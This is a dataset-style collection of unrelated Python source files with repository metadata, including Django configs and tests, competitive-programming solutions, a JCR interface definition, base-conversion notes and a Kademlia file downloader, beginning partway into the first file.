format = 'csv'
def render(self, data, media_type=None, renderer_context=None):
return super(CSVRenderer, self).render(data, media_type, renderer_context)
|
[
"aniversarioperu1@gmail.com"
] |
aniversarioperu1@gmail.com
|
efecd6e8598ad283a82bc7fe6aab0b6dec4ceea3
|
5c333d9afed7ecf1feba34c41764184b70f725ea
|
/scripts/test.py
|
22d789f0c247add83cb748c9a559e96f2bcd14b5
|
[] |
no_license
|
NMGRL/pychrondata
|
4e3573f929b6a465fa959bfe5b5bdfe734514b8c
|
0d805ca6b7e5377f253d80ad93749b1d4253cb50
|
refs/heads/master
| 2020-12-24T16:35:39.308745
| 2016-03-09T18:37:47
| 2016-03-09T18:37:47
| 15,424,677
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
#!Extraction
def main():
'''
start at 0 zoom
focus
take picture
increment zoom
take picture
start at 100 zoom
focus
take picture....
'''
for i in range(10):
info('info {}'.format(i))
|
[
"jirhiker@gmail.com"
] |
jirhiker@gmail.com
|
16d51e454824f67b4b41ef3ca55f13c9e221bf28
|
81fe7f2faea91785ee13cb0297ef9228d832be93
|
/HackerRank/ajob_subsequence_bis.py
|
71a54d19dcac4f7ce8161b46f701309c0454498c
|
[] |
no_license
|
blegloannec/CodeProblems
|
92349c36e1a35cfc1c48206943d9c2686ea526f8
|
77fd0fa1f1a519d4d55265b9a7abf12f1bd7d19e
|
refs/heads/master
| 2022-05-16T20:20:40.578760
| 2021-12-30T11:10:25
| 2022-04-22T08:11:07
| 54,330,243
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 783
|
py
|
#!/usr/bin/env python3
# cf ajob_subsequence.py
# Method 2: using Lucas's theorem
def digits(n):
D = []
while n:
n,d = divmod(n,P)
D.append(d)
return D
def inv(n):
return pow(n,P-2,P)
def binom(n,p):
if 0<=p<=n:
return (Fact[n] * inv((Fact[p]*Fact[n-p])%P)) % P
return 0
def binom_lucas(n,k):
assert 0<=k<=n
Dn = digits(n)
Dk = digits(k)
while len(Dk)<len(Dn):
Dk.append(0)
res = 1
for ni,ki in zip(Dn,Dk):
res = (res * binom(ni,ki)) % P
return res
if __name__=='__main__':
T = int(input())
for _ in range(T):
N,K,P = map(int,input().split())
Fact = [1]*P
for i in range(2,P):
Fact[i] = (Fact[i-1]*i) % P
print(binom_lucas(N+1,K+1))
|
[
"blg@gmx.com"
] |
blg@gmx.com
|
1eb2f715857b7860d37606c858a8ac2c834a2f58
|
87fb0ae5563512bf4cfe2754ea92e7f4173f753f
|
/Chap_08/Ex_181.py
|
ba2d1b32e7dabdca85b694f6e4635d4a64b0e168
|
[] |
no_license
|
effedib/the-python-workbook-2
|
87291f5dd6d369360288761c87dc47df1b201aa7
|
69532770e6bbb50ea507e15f7d717028acc86a40
|
refs/heads/main
| 2023-08-21T13:43:59.922037
| 2021-10-12T20:36:41
| 2021-10-12T20:36:41
| 325,384,405
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,247
|
py
|
# Possible Change
# Read both the dollar amount and the number of coins from user and display a message indicating whether or not the
# entered amount can be formed using the number of coins indicated.
def possibleChange(dollars, coins, index=0):
coins_list = [0.25, 0.10, 0.05, 0.01]
dollars = round(dollars, 2)
if dollars == 0 and coins == 0:
return True
elif index >= len(coins_list):
return False
print("index '{:.2f}'\t{:.2f} dollars\t{:.2f} coins".format(coins_list[index], dollars, coins))
if dollars == 0 or coins == 0:
dollars += coins_list[index]
coins += 1
index += 1
return possibleChange(dollars, coins, index)
elif (dollars / coins) in coins_list:
return True
else:
if dollars >= coins_list[index]:
dollars -= coins_list[index]
coins -= 1
else:
index += 1
return possibleChange(dollars, coins, index)
def main():
total = float(input('Enter the total amount: '))
coin = int(input('How many coins do you want to use? '))
for i in range(1, (coin+1)):
print("{} coins:\t{}".format(coin, possibleChange(total, coin)))
if __name__ == "__main__":
main()
|
[
"cicciodb@hotmail.it"
] |
cicciodb@hotmail.it
|
33516c24ec951e32d2454058cccb932ff632af1d
|
9855a6472fa9cd0a0ed75d5d1110eb5450e38c35
|
/django_mailbox/runtests.py
|
f5b0ff3b0c41ddd22e10232d108f622b41e04984
|
[] |
no_license
|
JessAtBlocBoxCo/blocbox
|
efef025333b689e4c9e0fb6a7bfb2237fcdc72a0
|
0966fd0ba096b2107bd6bd05e08c43b4902e6ff2
|
refs/heads/master
| 2020-04-11T04:30:25.792700
| 2015-09-22T04:41:34
| 2015-09-22T04:41:34
| 23,008,502
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,117
|
py
|
#!/usr/bin/env python
import sys
from os.path import dirname, abspath
try:
from django import setup
except ImportError:
pass
from django.conf import settings
if not settings.configured:
settings.configure(
DATABASES={
'default': {
'ENGINE': 'django.db.backends.sqlite3',
},
},
INSTALLED_APPS=[
'django.contrib.auth',
'django.contrib.contenttypes',
'django_mailbox',
]
)
from django.test.simple import DjangoTestSuiteRunner
def runtests(*test_args):
if not test_args:
test_args = ['django_mailbox']
parent = dirname(abspath(__file__))
sys.path.insert(0, parent)
try:
# ensure that AppRegistry has loaded
setup()
except NameError:
# This version of Django is too old for an app registry.
pass
runner = DjangoTestSuiteRunner(
verbosity=1,
interactive=False,
failfast=False
)
failures = runner.run_tests(test_args)
sys.exit(failures)
if __name__ == '__main__':
runtests(*sys.argv[1:])
|
[
"jess@blocbox.co"
] |
jess@blocbox.co
|
15a59428a27529aafc46c577811104b43b63a731
|
460027c62df6a6939c342d2d2f49a727c8fc955c
|
/src/nuxeo/jcr/interfaces.py
|
0cd0ba5c447f9981fb9a2c9e36f5c777740674bf
|
[] |
no_license
|
nuxeo-cps/zope3--nuxeo.jcr
|
ef6d52272835fa14375308bf5a51dbee68b2252a
|
88e83d30232226ad71b6f24a2c00e5ad9ba5e603
|
refs/heads/main
| 2023-01-23T19:56:27.515465
| 2006-10-20T16:54:01
| 2006-10-20T16:54:01
| 317,994,526
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,597
|
py
|
##############################################################################
#
# Copyright (c) 2006 Nuxeo and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
# Author: Florent Guillaume <fg@nuxeo.com>
# $Id$
"""Capsule JCR interfaces.
"""
from zope.interface import Interface
from ZODB.POSException import ConflictError # for reimport
class ProtocolError(ValueError):
pass
class IJCRController(Interface):
"""Commands between Zope and the JCR bridge.
All commands are synchronous.
The commands may also return JCR events, if some have been sent.
They are accumulated and can be read by ``getPendingEvents()``.
"""
def connect():
"""Connect the controller to the server.
"""
def login(workspaceName):
"""Login to a given workspace.
This is the first command sent. It creates a session on the
JCR side and puts it into a transaction.
Returns the root node UUID.
"""
def prepare():
"""Prepare the current transaction for commit.
May raise a ConflictError.
"""
def commit():
"""Commit the prepared transaction, start a new one.
"""
def abort():
"""Abort the current transaction, start a new one.
"""
def checkpoint(uuid):
"""Checkpoint: checkin and checkout
"""
def restore(uuid, versionName=''):
"""Restore a node.
Return list of uuids to deactivate.
"""
def getNodeTypeDefs():
"""Get the schemas of the node type definitions.
Returns a string containing a set of CND declarations.
System types may be omitted.
"""
def getNodeType(uuid):
"""Get the type of a node.
"""
def getNodeStates(uuids):
"""Get the state of several nodes.
Additional node states may be returned, to improve network
transfers.
Returns a mapping of UUID to a tuple (`name`, `parent_uuid`,
`children`, `properties`, `deferred`).
- `name` is the name of the node,
- `parent_uuid` is the UUID of the node's parent, or None if
it's the root,
- `children` is a sequence of tuples representing children
nodes, usually (`name`, `uuid`, `type`), but for a child with
same-name siblings, (`name`, [`uuid`s], `type`),
- `properties` is a sequence of (`name`, `value`),
- `deferred` is a sequence of `name` of the remaining deferred
properties.
An error is returned if there's no such UUID.
"""
def getNodeProperties(uuid, names):
"""Get the value of selected properties.
Returns a mapping of property name to value.
An error is returned if the UUID doesn't exist or if one of the
names doesn't exist as a property.
"""
def sendCommands(commands):
"""Send a sequence of modification commands to the JCR.
`commands` is an iterable returning tuples of the form:
- 'add', parent_uuid, name, node_type, props_mapping, token
- 'modify', uuid, props_mapping
- 'remove', uuid
- 'order' XXX
A JCR save() is done after the commands have been sent.
Returns a mapping of token -> uuid, which gives the new UUIDs
for created nodes.
"""
def getPendingEvents():
"""Get pending events.
The pending events are sent asynchronously by the server and
accumulated until read by this method.
"""
def getPath(uuid):
"""Get the path of a given UUID.
Returns the path or None.
The path is relative to the JCR workspace root.
"""
def searchProperty(prop_name, value):
"""Search the JCR for nodes where prop_name = 'value'.
Returns a sequence of (uuid, path).
The paths are relative to the JCR workspace root.
"""
def move(uuid, dest_uuid, name):
"""Move the document to another container.
"""
def copy(uuid, dest_uuid, name):
"""Copy the document to another container.
"""
|
[
"devnull@localhost"
] |
devnull@localhost
|
3aaf3331c8160b13805128f0a48758614d163f12
|
e5f7d7706062b7807daafaf5b670d9f273440286
|
/stocks/admin.py
|
3da94a24279993788e7694d3af8b4fe75814404d
|
[] |
no_license
|
fchampalimaud/flydb
|
bd01839c163aa34277091f454f8ad38e3fd45dc4
|
2d3ad9ff5903a26070258f707228334cd765a647
|
refs/heads/master
| 2021-06-17T15:38:25.517946
| 2018-01-17T16:16:00
| 2018-01-17T16:16:00
| 185,334,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
from pathlib import Path
from django.contrib import admin
from django.apps import apps
app = apps.get_app_config(Path(__file__).parent.name)
for model in app.get_models():
admin.site.register(model)
|
[
"hugo.cachitas@research.fchampalimaud.org"
] |
hugo.cachitas@research.fchampalimaud.org
|
74f037f36854ed429ba78246687bfa075c1ec9b2
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_206/689.py
|
ade9216b11543d12d4e0795d77c30c952d9e8947
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,062
|
py
|
from itertools import \
product, \
permutations, \
combinations, \
combinations_with_replacement
from functools import reduce, lru_cache
from math import floor,ceil,inf,sqrt
def intercept_time(i,j):
if i[1] == j[1]:
return inf
else:
return (j[0]-i[0])/(i[1]-j[1])
def intercept_distance(i,j):
if intercept_time(i,j) < 0:
return inf
else:
return intercept_time(i,j)*i[1] + i[0]
def solve(D, horses):
horses.sort()
while len(horses) > 1:
if intercept_distance(horses[-2], horses[-1]) < D:
del horses[-2]
else:
del horses[-1]
return D / intercept_time(horses[0], (D,0))
if __name__ == '__main__':
import sys,re
data = iter(sys.stdin.read().splitlines())
T = int(next(data))
for (case_num, case) in enumerate(data):
D,N = map(int, case.split())
horses = []
for _ in range(N):
horses.append(tuple(map(int, next(data).split())))
print('Case #{}: {}'.format(case_num+1, solve(D, horses)))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
d6886e124c6a5e23cfe5c3167ad569f20e55a369
|
3cedb583e9f3dfcdf16aeba56a0b3ff7c6213e99
|
/python-codes/m2_curso_em_video_estruturas_de_controle/ex048.0.py
|
7c2fd6a5930cb1648fc94bfe1920cee6b20f008b
|
[
"MIT"
] |
permissive
|
lucasportella/learning-python
|
0f39ae2389db6d07b5b8c14ebe0c24f1e93c77c5
|
a9449dffd489e7e1f1619e3acef86bc2c64f0f14
|
refs/heads/master
| 2022-12-26T15:04:12.806300
| 2020-10-14T23:17:47
| 2020-10-14T23:17:47
| 260,685,503
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 273
|
py
|
soma = 0
somaPA = 0
print('Todos os números ímpares múltiplos de 3 até 500:')
for cont in range(1,501,2):
if cont % 3 == 0:
soma += 1
somaPA += cont
print(cont,end=' ')
print('\n Número de repetições:', soma)
print('Soma da PA:', somaPA)
|
[
"lucasportellaagu@gmail.com"
] |
lucasportellaagu@gmail.com
|
e45a1fac5b581c35a286bd8251ccc0e3f6475205
|
ee4a0698f75aa2500bf2ce1b5e5331bc8b57157a
|
/myproject/course/models.py
|
738e4fda86e0a0457361f274b8a857115dd7a817
|
[] |
no_license
|
coderrohanpahwa/one_to_one_model
|
5398732410027bfad91c5d5db01e528397c87703
|
df4fd8ce89d74d41d49671ba8dd5759b80af3d43
|
refs/heads/main
| 2022-12-25T14:12:31.253350
| 2020-10-06T08:58:38
| 2020-10-06T08:58:38
| 301,669,111
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 239
|
py
|
from django.db import models
from django.contrib.auth.models import User
from .views import k
# Create your models here.
class Answer(models.Model):
user=models.OneToMany(User,models.CASCADE)
answer=models.CharField(max_length=100)
|
[
"coderrohanpahwa@gmail.com"
] |
coderrohanpahwa@gmail.com
|
e123eb5ce78814907f4c0576ae6dc701c3f31bc2
|
c105570f12f1d56087ffb831f5d34cd763d6c90b
|
/top/api/rest/WlbWaybillIQuerydetailRequest.py
|
e31f3da969397463b9eaf5940b3a4f8b3c5c3026
|
[] |
no_license
|
wjianwei126/Alinone
|
01607423833d7736b2fd3c77e9e21f63c69b4e4c
|
80144d4657cb049d651c09647eb245405240f12f
|
refs/heads/master
| 2020-12-07T05:14:58.746777
| 2015-05-06T12:48:33
| 2015-05-06T12:48:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
'''
Created by auto_sdk on 2014-11-09 14:51:18
'''
from top.api.base import RestApi
class WlbWaybillIQuerydetailRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.waybill_detail_query_request = None
def getapiname(self):
return 'taobao.wlb.waybill.i.querydetail'
|
[
"rapospectre@0163.com"
] |
rapospectre@0163.com
|
d0f1683880dd97dbf57a8ff8ca500f4470b5aa9f
|
a42ed872908291bbfc5ae2f68968edc4c47edfcf
|
/lesson_16/choices_test.py
|
8c1ac0adaa1e1dc47e02cf3b312e2d5874927c43
|
[] |
no_license
|
antonplkv/itea_advanced_august
|
b87f48cc48134ce1a73e167a5c834322792d0167
|
265c124e79747df75b58a1fd8c5d13605c1041b2
|
refs/heads/master
| 2023-01-02T23:31:39.050216
| 2020-10-28T19:15:01
| 2020-10-28T19:15:01
| 291,792,884
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 660
|
py
|
import mongoengine as me
me.connect('testtetsttetst')
class Task(me.Document):
LOW_PRIORITY = 1
MEDIUM_PRIORITY = 2
HIGH_PRIORITY = 3
PRIORITIES = (
(LOW_PRIORITY, 'Низкий приоритет'),
(MEDIUM_PRIORITY, 'Средний приоритет'),
(HIGH_PRIORITY, 'Высокий приоритет')
)
INSIDE_CATEGORY = 1
OUTSIDE_CATEGORY = 2
CATEGORIES = (
(INSIDE_CATEGORY, 'Проблема в магазине'),
(OUTSIDE_CATEGORY, 'Проблема на складе'),
)
priority = me.IntField(choices=PRIORITIES)
category = me.IntField(choices=CATEGORIES)
|
[
"polyakov.anton@ukr.net"
] |
polyakov.anton@ukr.net
|
10f47f80b7c9c1ebf1af1c941dbe2dbbc69c281d
|
a5b4384d1eaef17875499a3f721fedb91afa9fba
|
/usr/app/wsgi/tests/test_identification.py
|
4b2a91ae1772c81ee9d77f68ffac95c017821d1e
|
[] |
no_license
|
wizardsofindustry/quantum-usr
|
85f609b8c08264d69204f696bea0446df19f0eb6
|
d49a3dcdf4df2ce31324f5ec98ae5c7130e01cbb
|
refs/heads/master
| 2021-07-18T06:51:16.034613
| 2018-11-23T19:20:23
| 2018-11-23T19:25:16
| 136,974,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,983
|
py
|
import unittest
import ioc
import sq.test
import sq.lib.x509
from ....infra import orm
from ..endpoints import IdentificationEndpoint
@sq.test.integration
class X509SubjectIdentificationTestCase(sq.test.SystemTestCase):
gsid ="00000000-0000-0000-0000-000000000000"
metadata = orm.Relation.metadata
def setUp(self):
super(X509SubjectIdentificationTestCase, self).setUp()
self.endpoint = IdentificationEndpoint()
self.service = ioc.require('SubjectIdentificationService')
with open('dev/usr.testing.crt', 'rb') as f:
self.pem = f.read()
self.crt = sq.lib.x509.Certificate.frompem(self.pem)
self.service.associate(self.gsid,
{'type': 'x509', 'crt': bytes.hex(self.pem)})
@unittest.skip
def test_subject_is_identified_by_email(self):
"""Identify a Subject by email."""
request = sq.test.request_factory(
method='POST',
json=[{
'type': 'email',
'email': "cochise.ruhulessin@wizardsofindustry.net"
}]
)
response = self.run_callable(self.loop, self.endpoint.handle, request)
def test_subject_is_identified_by_x509(self):
"""Identify a Subject by X.509 certificate."""
dto = {
'type': 'x509',
'crt': bytes.hex(self.pem)
}
request = self.request_factory(method='POST', json=dto)
response = self.run_callable(self.loop, self.endpoint.handle, request)
self.assertEqual(response.status_code, 200)
def test_unknown_principal_type_returns_404(self):
"""Identify a Subject by X.509 certificate."""
dto = {
'type': 'foo',
'crt': bytes.hex(self.pem)
}
request = self.request_factory(method='POST', json=dto)
response = self.run_callable(self.loop, self.endpoint.handle, request)
self.assertEqual(response.status_code, 404)
#pylint: skip-file
|
[
"cochise.ruhulessin@wizardsofindustry.net"
] |
cochise.ruhulessin@wizardsofindustry.net
|
e9a512b76683460e70e8f31c4ae4f2d4f5144fb0
|
62c613e1f2bf062f807294ec6da4ae35bda6ac86
|
/abc146-d.py
|
195a5dc74cc33e8cfd7bc84c234a493644e42d2a
|
[] |
no_license
|
teru01/python_algorithms
|
6b463c78c801b68f93dda2be2f67c9688dc3cc07
|
8feb194f53b619ab7b9c964a32df7b4df32b6f2e
|
refs/heads/master
| 2020-06-11T02:33:27.939830
| 2020-04-27T01:32:37
| 2020-04-27T01:32:37
| 193,827,088
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,178
|
py
|
import sys
input = sys.stdin.readline
from operator import itemgetter
sys.setrecursionlimit(10000000)
INF = 10**30
from collections import deque
def main():
n = int(input().strip())
G = [[] for _ in range(n)]
A = [0] * n
B = [0] * n
for i in range(n-1):
a, b = list(map(int, input().strip().split()))
A[i] = a
B[i] = b
G[a-1].append([b-1, 0])
G[b-1].append([a-1, 0])
root = 0
mlen = len(G[0])
for i in range(n):
if mlen < len(G[i]):
mlen = len(G[i])
root = i
nodes = [0] * n
q = deque()
q.append((root, -1))
while len(q) > 0:
v, fr = q.popleft()
for y, (w, _) in enumerate(G[v]):
color = 1
if w != fr:
if fr == -1:
print(v, w)
G[v][y][1] = color
elif G[v][fr][1] != color:
G[v][y][1] = color
else:
color += 1
G[v][w][1] = color
q.append((w, v))
color += 1
for i in range(n):
print(G[i])
if __name__ == '__main__':
main()
|
[
"teru0x01.sheep@gmail.com"
] |
teru0x01.sheep@gmail.com
|
efa66284d47dc7d43341155eaa34d87506ce3814
|
982344011a248b0f514ffb8d0c87c13f2f2e113e
|
/day1/conv.py
|
a03b4d03b507ada57975e15de49aabf5b16b5d56
|
[] |
no_license
|
patrickjwolf/CS32_Architecture_GP
|
7f6c68de92155b7b9b295f7d35413637cebce45a
|
8704add1c6ed1f917451544e1573bed005eaa3ac
|
refs/heads/master
| 2022-12-06T15:26:54.715887
| 2020-08-19T22:45:21
| 2020-08-19T22:45:21
| 288,225,480
| 0
| 0
| null | 2020-08-17T16:05:34
| 2020-08-17T16:05:33
| null |
UTF-8
|
Python
| false
| false
| 2,567
|
py
|
# In general, the `.format` method is considered more modern than the printf `%`
# operator.
# num = 123
# # Printing a value as decimal
# print(num) # 123
# print("%d" % num) # 123
# print("{:d}".format(num)) # 123
# print(f"{num:d}") # 123
# # Printing a value as hex
# print(hex(num)) # 0x7b
# print("%x" % num) # 7b
# print("%X" % num) # 7B
# print("%04X" % num) # 007B
# print(f"{num:x}") # 7b
# print(f"{num:X}") # 7B
# print(f"{num:04x}") # 007b
# # Printing a value as binary
# print("{:b}".format(num)) # 1111011, format method
"""
take input as a string
1111011
take input string
7b
turn in to a list
[1, 1, 1, 1, 0, 1, 1]
[7, b]
reverse the list
[1, 1, 0, 1, 1, 1, 1]
[b, 7]
multiply each element by its power of 2 respectively
1 * 1
1 * 2
0 * 4
1 * 8
1 * 16
1 * 32
1 * 64
b * 1 => 11
7 * 16 => 112
# taken the numbers and addedthem together
1 + 2 + 0 + 8 + 16 + 32 + 64
3 + 8 + 16 + 32 + 64
11 + 16 + 32 + 64
27 + 32 + 64
59 + 64
11 + 112
# returning a result in decimal
123
123
"""
# # Converting a decimal number in a string to a value
# s = "1234"; # 1234 is 0x4d2
# x = int(s); # Convert base-10 string to value
# # Printing a value as decimal and hex
# print(num) # 1234
# print(f"{num:x}") # 4d2
# # Converting a binary number in a string to a value
# s = "100101" # 0b100101 is 37 is 0x25
# x = int(s, 2) # Convert base-2 string to value
# # Printing a value as decimal and hex
# print(num) # 37
# print(f"{num:x}") # 25
# Conversion Python code:
# string1 = "10101010"
# 1 * 128
# 0 * 64
# 1 * 32
# 0 * 16
# 1 * 8
# 0 * 4
# 1 * 2
# 0 * 1
# reverse_string1 = "01010101"
# loop from 0 -> size of list - 1
# index = 0 -> 7
# base = 2
# index ** base
# 0 ** 2 => 1
# 1 ** 2 => 2
# 2 ** 2 => 4
# 3 ** 2 => 8
# 4 ** 2 => 16
# 5 ** 2 => 32
# 6 ** 2 => 64
# 7 ** 2 => 128
# multiplyer = 1 -> 128
# 0 * multiplyer
# 0 * 1 = 0
# 1 * 2 = 2
# 0 * 4 = 0
# 1 * 8 = 8
# 0 * 16 = 0
# 1 * 32 = 32
# 0 * 64 = 0
# 1 * 128 = 128
# value = 0
# value += 0
# value += 2
# value += 0
# value += 8
# value += 0
# value += 32
# value += 0
# value += 128
# ret value => 170
# [1, 0, 1, 0, 1, 0, 1, 0]
# [0, 1, 0, 1, 0, 1, 0, 1]
# digit_list[i] == 0
# + 0 * 1
# 0
# + 1 * 2
# 2
# 128 + 32 + 8 + 2
# Lets convert diferent bases to decimal
def to_decimal(num_string, base):
pass
print(to_decimal("7b", 16)) # => 123
print(to_decimal("010111010110101", 2)) # => 123
|
[
"tomtarpeydev@gmail.com"
] |
tomtarpeydev@gmail.com
|
3c62b147291c14be369f9d73ced805f7f8773c2f
|
5044413a31d50b8220c87ae02acc7b059c7bf5ec
|
/T2/KademliaLibrary/example/download.py
|
4be810183d08324cbd67d47e8459bd7b3f0cb044
|
[] |
no_license
|
rjherrera/IIC2523
|
500540350d06a1d11866093ec8d5df984728875c
|
756c4a3d9a59d72f66280333c8b48536c03ab592
|
refs/heads/master
| 2020-03-28T00:25:53.312660
| 2017-12-13T19:06:41
| 2017-12-13T19:06:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
from kademlia_iic2523.ipc import ipcSend
import requests
import socket
import sys
FILES_FOLDER = '/user/rjherrera/T2/files'
def download(url):
# try as we may recieve unexpected things. Also to use a friendly way of showing errors
try:
# use the requests library to try to download the file
r = requests.get(url, stream=True)
if r.status_code == 200:
# if we can we dump it to the desired location
with open('%s/%s' % (FILES_FOLDER, sys.argv[1]), 'wb') as f:
for chunk in r.iter_content(1024):
f.write(chunk)
return True
raise Exception(r.status_code)
except Exception as error:
print(error)
return False
def onResponse(message):
ip_address = socket.gethostbyname(socket.gethostname())
for url in message:
if download(url):
node_url = 'http://%s:11009/%s' % (ip_address, sys.argv[1])
# 'set' the file in our location (node_url) -> we are now registered as a server for it
ipcSend('set %s %s' % (sys.argv[1], node_url))
return
print('File not downloaded.')
ipcSend('get %s' % sys.argv[1], onResponse)
|
[
"rjherrera@uc.cl"
] |
rjherrera@uc.cl
|
2b206bd77e2c71810ed891c15081bb40dd02a4af
|
c05357142b9f112d401a77f9610079be3500675d
|
/danceschool/core/urls.py
|
acc3ba46762b7690b07c61b675bf598fcdb0daac
|
[
"BSD-3-Clause"
] |
permissive
|
NorthIsUp/django-danceschool
|
b3df9a9373c08e51fcaa88751e325b6423f36bac
|
71661830e87e45a3df949b026f446c481c8e8415
|
refs/heads/master
| 2021-01-02T22:42:17.608615
| 2017-08-04T17:27:37
| 2017-08-04T17:27:37
| 99,373,397
| 1
| 0
| null | 2017-08-04T19:21:50
| 2017-08-04T19:21:50
| null |
UTF-8
|
Python
| false
| false
| 2,997
|
py
|
from django.conf.urls import url
from django.contrib import admin
from .feeds import EventFeed, json_event_feed
from .views import SubmissionRedirectView, InstructorStatsView, OtherInstructorStatsView, IndividualClassView, IndividualEventView, StaffDirectoryView, EmailConfirmationView, SendEmailView, SubstituteReportingView, InstructorBioChangeView, AccountProfileView, OtherAccountProfileView
from .ajax import UserAccountInfo, updateSeriesAttributes, getEmailTemplate
from .autocomplete_light_registry import CustomerAutoComplete, UserAutoComplete
admin.autodiscover()
urlpatterns = [
# These URLs are for Ajax and autocomplete functionality
url(r'^staff/substitute/filter/$', updateSeriesAttributes, name='ajaxhandler_submitsubstitutefilter'),
url(r'^staff/sendemail/template/$', getEmailTemplate, name='ajaxhandler_getemailtemplate'),
url(r'^staff/autocomplete/user', UserAutoComplete.as_view(), name='autocompleteUser'),
url(r'^staff/autocomplete/customer', CustomerAutoComplete.as_view(), name='autocompleteCustomer'),
url(r'^accounts/info/$', UserAccountInfo.as_view(), name='getUserAccountInfo'),
# For general admin form submission redirects
url(r'^form/submitted/$', SubmissionRedirectView.as_view(), name='submissionRedirect'),
url(r'^staff/directory/$',StaffDirectoryView.as_view(),name='staffDirectory'),
url(r'^staff/sendemail/$', SendEmailView.as_view(),name='emailStudents'),
url(r'^staff/sendemail/confirm/$', EmailConfirmationView.as_view(),name='emailConfirmation'),
url(r'^staff/substitute/$', SubstituteReportingView.as_view(),name='substituteTeacherForm'),
# These provide the ability to view one's own stats or another instructor's stats
url(r'^staff/instructor-stats/(?P<first_name>[\w\+\.]+)-(?P<last_name>[\w\+\.]+)/$', OtherInstructorStatsView.as_view(), name='instructorStats'),
url(r'^staff/instructor-stats/$', InstructorStatsView.as_view(), name='instructorStats'),
# This provides the ability to edit one's own bio
url(r'^staff/bio/$', InstructorBioChangeView.as_view(), name='instructorBioChange'),
# These are for the calendar feeds
url(r'^events/feed/$', EventFeed(), name='calendarFeed'),
url(r'^events/feed/json/$', json_event_feed, name='jsonCalendarFeed'),
url(r'^events/feed/(?P<instructorFeedKey>[\w\-_]+)$', EventFeed(), name='calendarFeed'),
url(r'^events/feed/json/(?P<instructorFeedKey>[\w\-_]+)$', json_event_feed, name='jsonCalendarFeed'),
# These are for individual class views and event views
url(r'^classes/(?P<year>[0-9]+)/(?P<month>[\w]+)/(?P<slug>[\w\-_]+)/$', IndividualClassView.as_view(), name='classView'),
url(r'^events/(?P<year>[0-9]+)/(?P<month>[\w]+)/(?P<slug>[\w\-_]+)/$', IndividualEventView.as_view(), name='eventView'),
url(r'^accounts/profile/(?P<user_id>[0-9]+)/$', OtherAccountProfileView.as_view(), name='accountProfile'),
url(r'^accounts/profile/$', AccountProfileView.as_view(), name='accountProfile'),
]
|
[
"lee.c.tucker@gmail.com"
] |
lee.c.tucker@gmail.com
|
c32bf7266de063e1e276f4b6ab28ed930165b860
|
9f7d4d76c7e66aa424a5f8723575dc489f1fd2ab
|
/2022/15/15.py
|
7d6fdb456fc09a05011e86519edbfcdeac7af504
|
[
"MIT"
] |
permissive
|
kristianwiklund/AOC
|
df5a873287304816f25d91259c6e6c99c7a5f4bf
|
d9a668c406d2fd1b805d9b6a34cffa237a33c119
|
refs/heads/master
| 2023-01-12T09:01:11.012081
| 2023-01-02T19:12:29
| 2023-01-02T19:12:29
| 227,458,380
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,007
|
py
|
import sys
sys.path.append("../..")
from utilities import *
import networkx as nx
from copy import deepcopy
from pprint import pprint
arr = readarray("input.txt")
row = 2000000
#row=10
beac=list()
sens=list()
for l in arr:
x=int(l[2].split("=")[1].strip(","))
y=int(l[3].split("=")[1].strip(":"))
s=complex(x,y)
# print(s)
sens.append(s)
x=int(l[8].split("=")[1].strip(","))
y=int(l[9].split("=")[1].strip(":"))
b=complex(x,y)
# print(b)
beac.append(b)
print(sens)
# for each beacon
# identify the lines defining the area of the relevant beacon coverage
# project those lines on the line we want to look at
# the length of the line grows with +1 on each side from the center for each row above the furthest row
# the result is a set of lines showing what is covered
def cover(s,b,l):
d = int(abs(s.imag-b.imag)+abs(s.real-b.real))
if int(s.imag+d)<l:
return None
# d is the max distance where we have guaranteed no other beacons
# at that place, we have one single blob right below the sensor
# at position (s.real, s.imag+d)
# for each distance above this, we get an additional blob on the
# side
side = d-abs(s.imag-l)
if(side<0):
return None
# print("cover",s,b,"(s)",side,"<<",d,">>",(s.real - abs(side), s.real + abs(side)))
return (s.real - abs(side), s.real + abs(side))
def lineme(row):
line=list()
for i in range(len(sens)):
c = cover(sens[i],beac[i],row)
if c:
line.append(c)
line=sorted(line,key=lambda x:x[0])
return line
#print(mi,ma)
def yes(x, line):
for i in line:
if x>=i[0] and x<=i[1]:
return True
return False
def scoreme(line, maxx=None):
score=0
ma = max([int(y) for x,y in line])
if maxx:
ma = max(maxx,ma)
mi = min([int(x) for x,y in line])
for i in range(mi,ma):
if yes(i,line):
score+=1
if (ma-mi)<80:
print("#",end="")
else:
if (ma-mi)<80:
print(".",end="")
return score
print("")
